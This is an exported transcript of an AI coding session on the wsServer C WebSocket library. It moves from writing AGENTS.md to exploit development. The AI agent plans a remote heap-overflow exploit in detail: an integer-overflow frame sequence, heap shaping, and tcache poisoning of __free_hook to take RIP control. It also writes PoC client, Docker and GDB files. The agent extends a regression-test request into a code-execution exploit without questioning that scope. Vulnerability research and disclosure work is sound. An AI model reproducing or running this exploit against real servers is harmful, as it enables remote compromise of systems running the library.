OpenCode

Create or update AGENTS.md

/home/lucas/Works/VibeCodedProjects/wsServer15/04/2026, 16:30:58103107 files

Diffs

AGENTS.md
@@ -0,0 +1,112 @@
1+# wsServer
2+
3+Tiny WebSocket server library in C99 (no external deps, only pthread).
4+
5+## Build
6+
7+```bash
8+make # libws.a + examples (preferred on Linux)
9+make examples # examples only
10+make clean
tests/Dockerfile.poc
@@ -0,0 +1,39 @@
1+FROM ubuntu:20.04
2+
3+ENV DEBIAN_FRONTEND=noninteractive
4+
5+RUN apt-get update && apt-get install -y \
6+ gcc make gdb python3 libc6-dbg patch
7+
8+COPY . /wsServer
9+WORKDIR /wsServer
10+
tests/poc_echo.c
@@ -0,0 +1,113 @@
1+/*
2+ * poc_echo.c - Single-threaded echo server for RIP-control PoC
3+ *
4+ * Differences from examples/echo/echo.c:
5+ * 1. Pre-populates tcache[0] with 3 free 32-byte chunks before
6+ * accepting connections (heap feng shui).
7+ * 2. onopen: on the 2nd connection, leaks one extra malloc(24)
8+ * so that the echo round-trip pops 2 more entries, reaching
9+ * the poisoned __free_hook address.
10+ * 3. Must be built with poc_single_thread.patch applied to ws.c
tests/poc_gdb.txt
@@ -0,0 +1,112 @@
1+# poc_gdb.txt — GDB helper script for wsServer RIP-control PoC
2+#
3+# Run: gdb -x tests/poc_gdb.txt ./tests/poc_echo
4+#
5+set disable-randomization on
6+set pagination off
7+
8+start
9+
10+printf "\n=== LIBC ADDRESSES ===\n"
tests/poc_rip_control.c
@@ -0,0 +1,536 @@
1+/*
2+ * poc_rip_control.c - Integer-overflow heap overwrite PoC for wsServer
3+ *
4+ * Target vulnerability: read_single_frame() in src/ws.c
5+ * Line 1453: *frame_size += fsd->frame_length (unchecked 64-bit add)
6+ * Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)
7+ * Lines 1519-1527: write loop using original fsd->frame_length
8+ *
9+ * Exploit: two-frame message where frame 2 carries a 64-bit length
10+ * that wraps *frame_size around the 2^64 boundary, defeating the
tests/poc_run.sh
@@ -0,0 +1,104 @@
1+#!/usr/bin/env bash
2+#
3+# poc_run.sh — build Docker image, run the single-threaded PoC echo
4+# server under GDB, then run the PoC client against it.
5+#
6+# Prerequisites: Docker, this script run from the wsServer root.
7+#
8+set -euo pipefail
9+
10+IMAGE="ws-poc"
tests/poc_single_thread.patch
@@ -0,0 +1,15 @@
1+--- a/src/ws.c
2++++ b/src/ws.c
3+@@ -1900,11 +1900,7 @@
4+ /* Client socket added to socks list ? */
5+ if (i != MAX_CLIENTS)
6+ {
7+- if (pthread_create(
8+- &client_thread, NULL, ws_establishconnection, &client_socks[i]))
9+- panic("Could not create the client thread!");
10+-
Create or update `AGENTS.md` for this repository.

The goal is a compact instruction file that helps future OpenCode sessions avoid mistakes and ramp up quickly. Every line should answer: "Would an agent likely miss this without help?" If not, leave it out.

User-provided focus or constraints (honor these):


## How to investigate

Read the highest-value sources first:
- `README*`, root manifests, workspace config, lockfiles
- build, test, lint, formatter, typecheck, and codegen config
- CI workflows and pre-commit / task runner config
- existing instruction files (`AGENTS.md`, `CLAUDE.md`, `.cursor/rules/`, `.cursorrules`, `.github/copilot-instructions.md`)
- repo-local OpenCode config such as `opencode.json`

If architecture is still unclear after reading config and docs, inspect a small number of representative code files to find the real entrypoints, package boundaries, and execution flow. Prefer reading the files that explain how the system is wired together over random leaf files.

Prefer executable sources of truth over prose. If docs conflict with config or scripts, trust the executable source and only keep what you can verify.

## What to extract

Look for the highest-signal facts for an agent working in this repo:
- exact developer commands, especially non-obvious ones
- how to run a single test, a single package, or a focused verification step
- required command order when it matters, such as `lint -> typecheck -> test`
- monorepo or multi-package boundaries, ownership of major directories, and the real app/library entrypoints
- framework or toolchain quirks: generated code, migrations, codegen, build artifacts, special env loading, dev servers, infra deploy flow
- repo-specific style or workflow conventions that differ from defaults
- testing quirks: fixtures, integration test prerequisites, snapshot workflows, required services, flaky or expensive suites
- important constraints from existing instruction files worth preserving

Good `AGENTS.md` content is usually hard-earned context that took reading multiple files to infer.

## Questions

Only ask the user questions if the repo cannot answer something important. Use the `question` tool for one short batch at most.

Good questions:
- undocumented team conventions
- branch / PR / release expectations
- missing setup or test prerequisites that are known but not written down

Do not ask about anything the repo already makes clear.

## Writing rules

Include only high-signal, repo-specific guidance such as:
- exact commands and shortcuts the agent would otherwise guess wrong
- architecture notes that are not obvious from filenames
- conventions that differ from language or framework defaults
- setup requirements, environment quirks, and operational gotchas
- references to existing instruction sources that matter

Exclude:
- generic software advice
- long tutorials or exhaustive file trees
- obvious language conventions
- speculative claims or anything you could not verify
- content better stored in another file referenced via `opencode.json` `instructions`

When in doubt, omit.

Prefer short sections and bullets. If the repo is simple, keep the file simple. If the repo is large, summarize the few structural facts that actually change how an agent should work.

If `AGENTS.md` already exists at `/home/lucas/Works/VibeCodedProjects/wsServer`, improve it in place rather than rewriting blindly. Preserve verified useful guidance, delete fluff or stale claims, and reconcile it with the current codebase.
zai-coding-plan
zai-coding-plan / glm-5.1
Step

I'll investigate the repository to understand its structure and conventions before proposing an AGENTS.md plan.

zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step

I now have a complete picture of the repository. Here's my plan for AGENTS.md:

Proposed AGENTS.md

The file would contain these sections:

Build

  • make — builds libws.a + examples (preferred on Linux)
  • CMake alternative: mkdir build && cd build && cmake .. && make
  • make examples — just examples
  • make clean — clean all artifacts

Tests

  • Tests require the Autobahn Testsuite (pip install autobahntestsuite) or Docker
  • Make: make tests (builds examples first, then runs Autobahn)
  • CMake: pass -DENABLE_WSSERVER_TEST=On to cmake, then ctest --verbose
  • make tests_check — validate results with validate_output.py
  • Fuzzing: AFL_FUZZ=yes make (requires AFL installed)

Coding Style (non-obvious, repo-specific)

  • Tabs (width 4), Allman braces, 85-col limit
  • C89-style comments only (/* ... */), never //
  • Doxygen for all functions/structs
  • No typedefs except for opaque types
  • Lowercase + underscores for functions/variables; uppercase for macros
  • Variables declared at top of scope
  • .clang-format present — use clang-format -style=file -i <file> but review output manually (it doesn't cover everything)

Architecture

  • src/ — library core (ws.c, handshake.c, sha1.c, base64.c, utf8.c)
  • include/ws.h — single public API header
  • examples/ — echo, ping, vtouchpad
  • extra/toyws/ — companion WS client (not a general-purpose client)
  • tests/ — Autobahn conformance + AFL fuzzing
  • No external dependencies; C99 + pthread only
  • Compile-time flag VALIDATE_UTF8 (default on) controls UTF-8 validation

PR Conventions

  • Small/trivial PRs (< 30 LOC): OK without an issue
  • Non-trivial changes: create an issue first

This captures what an agent would likely get wrong: the C89 comment requirement, the Allman brace style, the tab indentation, the test prerequisites (Autobahn), the fuzzing workflow, and the PR issue-first convention.

Does this look right, or would you like me to adjust anything before writing it?

Looks good, right the file.
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Done. AGENTS.md has been written at the repository root.

Ok so I'm one of creators of this program, we found a security vulnerability but in order to fix we need to make a unit test for testing regression. So for that, we need to make a exploration PoC. 

Here is the vulnerability summary, give a read, read the repo and ask questions if you need. after that let me know that I will let you know how we can proceed.

# Security issue: integer-overflow heap overwrite in frame reassembly

## Summary
A remote WebSocket client can trigger a heap buffer overflow by sending a fragmented message sequence with a large 64-bit payload length in a continuation frame.

The vulnerable logic is in `read_single_frame()` (`src/ws.c`):
- cumulative frame size is updated with unchecked 64-bit addition (`*frame_size += fsd->frame_length`),
- allocation size is computed with unchecked 64-bit addition (`realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)`),
- then the code writes `fsd->frame_length` bytes into that potentially undersized buffer.

Because unsigned overflow wraps in C, an attacker can make the allocation size small while still entering a very large write loop.

## Impact
- Remote crash (heap corruption / SIGSEGV) is straightforward.
- Depending on allocator/runtime hardening, this may be exploitable for remote code execution.

## Exploit sketch
1. Send an initial non-FIN text frame with small payload (e.g., 16 bytes) to set `msg_idx_data`.
2. Send a FIN continuation frame with 64-bit payload length close to `UINT64_MAX`.
3. The allocation-size expression wraps to a tiny size.
4. Stream arbitrary masked payload bytes; each byte is written past the allocated heap chunk.

This is remotely reachable from any TCP peer that can complete the WebSocket handshake.

## Recommended fix direction
- Before any addition involving lengths, use checked arithmetic and reject on overflow.
- Validate both:
  - cumulative message size (`*frame_size + fsd->frame_length`), and
  - allocation size (`*msg_idx + fsd->frame_length + fsd->is_fin`).
- On overflow/protocol violation, close with status code `1009` (message too big) or `1002` (protocol error).



zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step

I've thoroughly read the vulnerable code. Here's my analysis:

Confirmed Vulnerability Path

The bug is in read_single_frame() (src/ws.c:1410-1552), specifically:

  1. Line 1453*frame_size += fsd->frame_length; — unchecked 64-bit addition. When a first non-FIN fragment sets *frame_size to N, a second continuation fragment with frame_length close to UINT64_MAX wraps the sum to a small value.

  2. Line 1463if (*frame_size > MAX_FRAME_LENGTH) — this check is defeated because the wrapped value is tiny.

  3. Line 1505realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — the allocation size also wraps to a small number (e.g. ~6 bytes).

  4. Lines 1519-1527 — the write loop uses the original (huge) fsd->frame_length, writing past the heap chunk.

PoC Attack Sketch

  1. Valid HTTP upgrade handshake
  2. Non-FIN text frame with 16 bytes payload (sets msg_idx_data = 16, frame_size = 16)
  3. FIN continuation frame with frame_length = UINT64_MAX - 10 — the allocation wraps to ~7 bytes, the check passes, then the loop tries to write UINT64_MAX - 10 bytes into that 7-byte buffer.

Approach Options for the PoC/Regression Test

Question· PoC approach1 answered

How should we build the PoC and regression test? The existing fuzzing harness (ws_file) reads crafted binary files through the parser — but I notice ws_file() at line 2078 references a cli_events variable that doesn't appear to exist in the current code (looks like a leftover from the ws_events refactor to ws_server). Which approach do you prefer?

Fix ws_file + file-based PoC
Fix the cli_events issue in ws_file(), write a C program that crafts a binary file (handshake + malicious frames) and feeds it through ws_file(). Integrates with existing fuzzing infra.
Network-based PoC
Write a standalone C/Python program that connects to a live wsServer instance, completes the handshake over TCP, then sends the malicious fragment sequence. More realistic but harder to automate as a unit test.
New standalone test harness
Write a new self-contained C test program that bypasses ws_file, directly sets up a ws_connection with a pipe/memfd containing the crafted frames, and calls the parsing loop. No AFL dependency.
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Good, network-based it is. Here's my plan:

Network-based PoC Plan

What it does: A standalone C program that connects to a running wsServer instance (e.g. the echo example), completes the handshake, then sends a malicious two-frame sequence that triggers the integer overflow in read_single_frame().

Frame sequence:

FrameFINOpcodePayload LengthPurpose
10text (0x1)16 bytesSets msg_idx_data=16, frame_size=16
21continuation (0x0)0xFFFFFFFFFFFFFFF5 (UINT64_MAX - 10)Triggers overflow

Both frames are masked (server expects it — reads 4 mask bytes unconditionally at ws.c:1475-1478). Mask key = {0,0,0,0} for simplicity.

Why it crashes:

  • *frame_size += fsd->frame_length16 + 0xFFFFFFFFFFFFFFF5 wraps to 0x05, passes the MAX_FRAME_LENGTH check at line 1463
  • realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)16 + 0xFFFFFFFFFFFFFFF5 + 1 wraps to 0x06 — allocates ~6 bytes
  • The write loop at lines 1519-1527 tries to write 0xFFFFFFFFFFFFFFF5 bytes starting at msg[16] — immediate heap corruption on the first write past the 6-byte buffer

Program structure:

  1. connect_to_server(host, port) — TCP connect with host resolution
  2. do_handshake(sock) — send HTTP upgrade, read response
  3. send_exploit(sock) — send the two crafted frames + a small burst of payload bytes (just needs a few hundred bytes to corrupt past the tiny allocation, no need to send anywhere near the declared length)
  4. The server should crash (SIGSEGV or heap corruption) during frame reassembly

File location: tests/poc_overflow.c

I'm ready when you are — let me know if you want any adjustments to this plan before I start writing.

Ok so your objective is to prove we can manipulate `RIP` register. For that we will need to build a version with all compiler protections disabled (ASLR, Canary, etc...) - So sketch a plan on how to make that PoC.
zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Good. To prove RIP control, we need to chain the heap overflow into an arbitrary write primitive and then hijack control flow. Here's my plan:


Plan: RIP Control PoC

Phase 1: Build Infrastructure

Unprotected server build — new Makefile target that compiles the echo example with all mitigations off:

CFLAGS: -g -O0 -fno-stack-protector -fno-pie -D_FORTIFY_SOURCE=0
LDFLAGS: -no-pie -z norelro -z execstack

Disable ASLR:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Phase 2: PoC Client (tests/poc_rip_control.c)

A standalone C program that acts as a WebSocket client:

  1. Connect to host:port (default 127.0.0.1:8080)
  2. Handshake — send valid HTTP Upgrade, read 101 response
  3. Frame 1 — non-FIN text, 16 bytes payload, mask={0,0,0,0} (sets msg_idx=16, frame_size=16)
  4. Frame 2 — FIN continuation, declared length 0xFFFFFFFFFFFFFFF5, mask={0,0,0,0} (triggers the realloc wrap to ~6 bytes)
  5. Overflow payload — send crafted bytes starting at offset 16 past the undersized buffer. Two modes:
    • Crash mode: send 0x41 (A) bytes to demonstrate heap corruption → SIGSEGV
    • RIP mode: send a tailored payload at specific offsets to hit the exploitation target

Phase 3: Heap Reconnaissance (GDB)

This step is critical — we need to discover the exact heap layout before crafting the RIP-mode payload:

  1. Run the unprotected server under GDB
  2. Set breakpoint after the realloc at ws.c:1505 (after the wrap)
  3. Connect with the PoC in crash mode
  4. Examine:
    • p msg — our buffer address
    • x/40gx msg-16 — full chunk + adjacent chunks
    • info proc mappings — heap base, libc base, binary base
    • p &__free_hook — target address in libc
  5. Determine: what chunk lies after msg, what's in it, and whether there are free chunks we can corrupt

Phase 4: Exploit Strategy (depends on glibc version)

Most likely path — fastbin/tcache poisoning → __free_hook overwrite:

  1. The overflow writes past our msg chunk into the next chunk's fd pointer (if it's a free chunk) or corrupts its size field
  2. We forge a fake free chunk whose fd points to __free_hook - 0x10
  3. A subsequent malloc() returns a pointer to __free_hook
  4. We write our sentinel address (e.g., 0x4141414141414141) there
  5. When free(msg) is called at ws.c:1713, glibc calls __free_hookRIP = 0x4141414141414141

Alternative path — corrupt an adjacent allocated chunk's data: If there's a heap-allocated struct with a function pointer adjacent to msg, we can directly overwrite it. Candidate: ws_prm (allocated at server start, contains ws_server with event callbacks). Whether it's adjacent depends on Phase 3 findings.

Phase 5: Demonstrate RIP Control

$ gdb ./echo_unprotected
(gdb) run
# In another terminal:
$ ./poc_rip_control --mode rip

# GDB output:
# Program received signal SIGSEGV, Segmentation fault.
# 0x0000000041414141 in ?? ()

Seeing RIP = 0x4141414141414141 proves full control.

Deliverables

FilePurpose
tests/poc_rip_control.cPoC client (connect, handshake, exploit)
tests/Makefile.pocBuild rules for unprotected server + PoC binary
tests/poc_gdb.txtGDB script for heap reconnaissance

One question before we proceed:

Question· glibc version1 answered

What glibc version is on the target system? This determines which heap exploitation technique works (tcache poisoning, fastbin dup, etc.) and whether __free_hook is available.

Don't know, check at runtime
I'll detect the glibc version in the PoC and adapt the exploit strategy accordingly
glibc < 2.26
No tcache — fastbin/unsorted bin attacks
glibc 2.26 - 2.33
Tcache enabled but no key validation — simple tcache poisoning
glibc >= 2.34
__free_hook removed — need a different target (e.g., GOT overwrite, or corrupting __run_finally handlers)
zai-coding-plan
zai-coding-plan / glm-5.1
Step
Check glibc version
$ ldd --version 2>&1 | head -1
ldd (Ubuntu GLIBC 2.39-0ubuntu8.7) 2.39
zai-coding-plan
zai-coding-plan / glm-5.1
Step

glibc 2.39 — __free_hook was removed in 2.34 and safe-linking is active. That rules out the classic approach. Let me check what Docker base gives us the best target.

Check available Docker images
$ docker images 2>/dev/null | head -20 || echo "Docker not available or not running"
IMAGE                                           ID             DISK USAGE   CONTENT SIZE   EXTRA
mcr.microsoft.com/presidio-analyzer:2.2.360     248a5fb234ed       1.54GB             0B   U    
mcr.microsoft.com/presidio-anonymizer:2.2.360   97ebe789db35        249MB             0B   U    
mongo:latest                                    b6fc3eda4f9a        950MB             0B   U    
mysql:8                                         02ffa1ed2ee9        790MB             0B   U    
opencode-share-server-share-server:latest       f84b5a0bc10b       29.1MB             0B   U    
postgres:16-alpine                              108b27c919e6        276MB             0B        
postgres:17                                     3fe059c96160        453MB             0B   U    
redis:7-alpine                                  aa189b5a1954       41.4MB             0B        
testcontainers/ryuk:0.13.0                      b75bc7ce94c3        7.2MB             0B        
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Docker is available. Here's my revised plan given glibc 2.39 on the host:


Plan: RIP Control PoC

Why not glibc 2.39 directly

glibc 2.39 has no __free_hook, safe-linking (pointer mangling), and tcache key validation. Exploitation is possible (House of Apple 2, etc.) but requires forging IO_FILE structures — ~200+ lines of delicate glibc-internal manipulation that's fragile across point releases. Not worth it for a PoC.

Target environment: Docker (Ubuntu 20.04, glibc 2.31)

glibc 2.31 has __free_hook, tcache without safe-linking, no key validation. Classic tcache poisoning works cleanly.

Deliverables

FilePurpose
tests/poc_rip_control.cPoC client — connects, handshakes, triggers overflow, demonstrates RIP control
tests/Dockerfile.pocUbuntu 20.04 build environment with unprotected server + GDB
tests/poc_run.shOrchestrator: builds Docker image, runs server under GDB, runs PoC
tests/poc_gdb.txtGDB script: heap reconnaissance + verify RIP after crash

Exploitation Strategy: tcache poisoning → __free_hook → RIP

The wsServer message processing loop gives us alloc/free cycles we can use for heap shaping:

ws_establishconnection():
  while (next_complete_frame() >= 0) {
      onmessage(client_id, msg, frame_size, type);  // echo calls ws_sendframe_bcast
      free(msg);                                      // msg freed each iteration
  }

Each complete message: malloc(msg) → onmessage → malloc(response) → send → free(response) → free(msg).

Step-by-step:

  1. Connect + handshake — standard WebSocket upgrade.

  2. Heap shaping — send 6-7 complete text messages of a specific size S (e.g., 0x100 bytes). Each cycle: malloc(S) → malloc(response) → free(response) → free(S). This populates the tcache bin for size S with free chunks. We need to fill the tcache (7 entries for glibc 2.31) so subsequent frees go to the unsorted bin.

  3. Prepare the target chunk — send a message of size S, which gets freed into the now-full tcache (actually goes to fastbin or unsorted bin). Then send another message of size S — this allocation reuses a tcache entry, leaving a free chunk adjacent to where our exploit msg will land.

  4. Exploit message (two frames):

    • Frame 1: non-FIN text, 16 bytes → realloc(NULL, 16) = malloc(16) → allocates msg
    • Frame 2: FIN continuation, length = 0xFFFFFFFFFFFFFFF5realloc(msg, 6) (wrap) → same pointer (min chunk is 32 bytes), then overflow loop writes past msg into adjacent free chunk
    • Overflow payload: padding to reach the adjacent free chunk's fd pointer, then overwrite it with the address of __free_hook
  5. Trigger — after the overflow, next_byte() returns -1, function returns. Back in ws_establishconnection:

    • onmessage is called with the corrupted msg → ws_sendframe_bcast() → allocates a response buffer of size S → malloc returns __free_hook (from the poisoned tcache)
    • The response data is written to __free_hook — this includes parts of our msg payload (controlled data from frame 1)
    • Actually, the response size depends on the (wrapped) frame_size, which is tiny. We need the allocation to match the poisoned bin size.
    • Alternative trigger: free(msg) is called after onmessage returns. If msg's chunk was also corrupted, this could trigger exploitation.
  6. Demonstrate RIP control__free_hook now contains 0x4141414141414141. The next free() call jumps there. GDB confirms: RIP = 0x4141414141414141.

Heap shaping details (refined during Phase 3)

The exact number of shaping messages, the size S, and the offset to the target chunk's fd pointer will be determined empirically:

  • Run the server under GDB in the Docker container
  • Send shaping messages, breakpoint after free(msg), examine tcache: p *(struct tcache_perthread_struct *)tcache
  • Send the exploit, breakpoint after overflow, verify the fd corruption
  • Verify the malloc from poisoned tcache returns __free_hook

Build flags (inside Docker)

gcc -g -O0 -fno-stack-protector -fno-pie -D_FORTIFY_SOURCE=0 \
    -z norelro -z execstack -no-pie \
    src/ws.c src/base64.c src/sha1.c src/handshake.c src/utf8.c \
    examples/echo/echo.c -I include -pthread -o echo_unprotected

ASLR disabled: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

PoC client interface

bash
./poc_rip_control [--host HOST] [--port PORT] [--shaping-count N] \
                  [--shaping-size S] [--target-addr ADDR]

Parameters are configurable so the exact values can be tuned after heap reconnaissance.


Does this plan look right? If so I'll start building the deliverables.

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Goal

Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.

Instructions

  • The PoC must be network-based (connects to a running wsServer instance over TCP, not file-based via ws_file).
  • The server must be built with all protections disabled: no ASLR, no PIE, no stack canary, no RELRO, no NX, no FORTIFY_SOURCE.
  • The target environment is a Docker container running Ubuntu 20.04 (glibc 2.31) because the host system has glibc 2.39 (which removed __free_hook, has safe-linking, and tcache key validation — too complex for a PoC).
  • The exploitation strategy is tcache poisoning → __free_hook overwrite → RIP control.
  • The PoC client should be configurable (host, port, shaping count, shaping size, target address) so values can be tuned after heap reconnaissance.
  • Follow the repo's coding style: tabs, Allman braces, 85-col limit, C89 comments only (/* */), Doxygen for functions/structs.
  • Honor existing AGENTS.md conventions.

Discoveries

Vulnerability Details (confirmed by code review)

  • Location: read_single_frame() in src/ws.c:1410-1552
  • Line 1453: *frame_size += fsd->frame_length — unchecked 64-bit addition, wraps around
  • Line 1463: if (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small value
  • Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytes
  • Lines 1519-1527: write loop uses original (huge) fsd->frame_length, writing past the undersized buffer

Exploit Arithmetic

  • Frame 1: non-FIN text, 16 bytes → sets msg_idx=16, frame_size=16
  • Frame 2: FIN continuation, frame_length = 0xFFFFFFFFFFFFFFF5 (UINT64_MAX-10)
  • *frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH check
  • realloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation
  • Write loop starts at msg[16], writing far past the 6-byte buffer → heap corruption

Heap Shaping Opportunity

The ws_establishconnection() loop (ws.c:1752-1782) gives us alloc/free cycles per message:

malloc(msg) → onmessage → ws_sendframe_bcast (malloc response) → send → free(response) → free(msg)

This allows heap feng shui: send complete messages of size S to populate tcache bins (7 entries on glibc 2.31), then overflow into an adjacent free chunk's fd pointer.

ws_file() Bug (noted but not our problem)

ws_file() at ws.c:2078 references cli_events which doesn't exist in the current code — a leftover from the ws_eventsws_server refactor. Not relevant to our network-based PoC.

Host glibc

ldd --version → glibc 2.39. Docker is available on the system.

Server Frame Expectations

  • Server reads 4 mask bytes unconditionally (ws.c:1475-1478) — all client frames MUST have MASK bit set
  • Control frames must be FIN and ≤125 bytes (ws.c:1655-1662)
  • Frame format: byte0 (FIN+RSV+opcode), byte1 (MASK+length), optional extended length, 4-byte mask, payload

Accomplished

  1. Created AGENTS.md at repo root — compact instruction file for future agent sessions
  2. Analyzed the vulnerability — confirmed the integer overflow path, traced exact line numbers, computed exploit arithmetic
  3. Chose PoC approach — network-based (user decision over file-based or standalone harness)
  4. Chose target environment — Docker Ubuntu 20.04 (glibc 2.31) due to host glibc 2.39 being too hardened
  5. Developed exploitation plan — tcache poisoning → __free_hook overwrite → RIP control, with heap shaping via preparatory messages

NOT YET DONE (next steps):

  • Write tests/poc_rip_control.c — the PoC client (connect, handshake, heap shaping messages, exploit two-frame sequence, configurable payload)
  • Write tests/Dockerfile.poc — Ubuntu 20.04 image with gcc, gdb, build the unprotected echo server
  • Write tests/poc_run.sh — orchestration script (build Docker, run server under GDB, run PoC)
  • Write tests/poc_gdb.txt — GDB helper script for heap reconnaissance and RIP verification
  • Perform heap reconnaissance in Docker to determine exact shaping size S, message count, and fd pointer offset
  • Tune the PoC parameters based on reconnaissance
  • Demonstrate RIP = 0x4141414141414141 under GDB

Relevant files / directories

Created

  • AGENTS.md — repo instruction file (completed)

To be created

  • tests/poc_rip_control.c — PoC client
  • tests/Dockerfile.poc — Docker build environment
  • tests/poc_run.sh — orchestration script
  • tests/poc_gdb.txt — GDB helper script

Key existing files read

  • src/ws.cthe vulnerable file, especially lines 1410-1552 (read_single_frame), 1565-1720 (next_complete_frame), 1735-1808 (ws_establishconnection), 2051-2101 (ws_file)
  • include/ws.h — public API, struct definitions (ws_server, ws_events, ws_frame_data), constants (MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8)
  • examples/echo/echo.c — target server binary, uses ws_sendframe_bcast in onmessage
  • tests/fuzzy/ws_file.c — existing AFL fuzz harness (not used, but informed approach)
  • Makefile — build system, AFL_FUZZ=yes option, CFLAGS
  • CMakeLists.txt — alternative build, ENABLE_WSSERVER_TEST option
  • .github/workflows/c-cpp.yml — CI config
  • doc/CODING_STYLE.md — coding conventions
  • .clang-format — formatter config (Microsoft-based, tabs, 85-col)
Ok, so let's do the work then!
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/Dockerfile.poc — Ubuntu 20.04 build environment
Create tests/poc_rip_control.c — PoC client (connect, handshake, heap shape, overflow)
Create tests/poc_gdb.txt — GDB helper script for heap recon + RIP verification
Create tests/poc_run.sh — orchestration script (build Docker, run server, run PoC)
Build Docker image and do initial heap reconnaissance
Tune PoC parameters based on recon
Demonstrate RIP control under GDB
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Let me also check the internal structures and frame reading logic:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now let me check the Makefile to understand the build flags, and also check how the ws_sendframe_bcast function allocates memory (for heap shaping analysis):

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Let me look at how the server accept loop works and if there are any malloc calls in the main loop path:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now I have a complete understanding of the codebase. Let me create all four files.

Creating plan
Create tests/Dockerfile.poc — Ubuntu 20.04 build environment
Create tests/poc_rip_control.c — PoC client (connect, handshake, heap shape, overflow)
Create tests/poc_gdb.txt — GDB helper script for heap recon + RIP verification
Create tests/poc_run.sh — orchestration script (build Docker, run server, run PoC)
Build Docker image and do initial heap reconnaissance
Tune PoC parameters based on recon
Demonstrate RIP control under GDB
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/Dockerfile.poc — Ubuntu 20.04 build environment
Create tests/poc_rip_control.c — PoC client (connect, handshake, heap shape, overflow)
Create tests/poc_gdb.txt — GDB helper script for heap recon + RIP verification
Create tests/poc_run.sh — orchestration script (build Docker, run server, run PoC)
Build Docker image and do initial heap reconnaissance
Tune PoC parameters based on recon
Demonstrate RIP control under GDB
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now the main PoC client:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c
Edit applied successfully.

LSP errors detected in this file, please fix:
<diagnostics file="/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c">
ERROR [425:4] Call to undeclared function 'usleep'; ISO C99 and later do not support implicit function declarations (fix available)

poc_rip_control.c:425:4: note: did you mean 'sleep'?
ERROR [510:2] Call to undeclared function 'usleep'; ISO C99 and later do not support implicit function declarations
</diagnostics>
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The _DEFAULT_SOURCE needs to be defined before any system headers. Let me fix this:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c
Edit applied successfully.
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now the GDB helper script:

zai-coding-plan
